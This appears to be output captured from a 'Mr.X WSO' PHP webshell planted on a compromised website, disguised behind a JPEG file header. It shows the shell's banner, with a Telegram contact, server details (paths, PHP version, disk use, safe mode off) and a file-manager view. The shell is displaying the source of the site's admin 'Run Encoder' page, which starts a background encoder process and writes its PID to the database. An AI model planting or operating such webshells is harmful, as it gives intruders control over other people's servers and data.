����JFIF���������
| Attention: Uname: Php: Hdd: Cwd: | Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet 5.3.29 Safe mode: OFF Datetime: 2026-04-09 21:08:03 1999.30 GB Free: 67.36 GB (3%) /home/httpd/html/stoptube.com/ drwxr-xr-x [ root ] [ home ] Text | Server IP: 127.0.0.54 Client IP: 216.73.216.53 |
| [ Files ] | [ Logout ] |
|---|
<?
ini_set('default_socket_timeout', 24000);
ignore_user_abort();
require "header.php";
?>
<div class="content-page">
<div class="header-area">
<div class="breadcrumbs">
<a href="index.php">Admin Home</a>
<span><a href="encode.php">Run Encoder</a></span>
</div>
</div>
<div class="content-outer">
<h2>Run<strong>Encoder</strong></h2>
<? if (file_exists('scripts/encoder_running')) { ?>
<? } else { ?>
<? $pid = backgroundProcess("$php_path $basepath/admin/encoder_cron.php", "log.txt"); ?>
<div class="notification success">The encoder is now running as PID: <? echo $pid; ?></div>
<?
$pid = (int)$pid;
dbQuery("UPDATE status SET encoder_pid = '$pid'");
?>
<? } ?>
</div>
</div>
<? require "footer.php"; ?>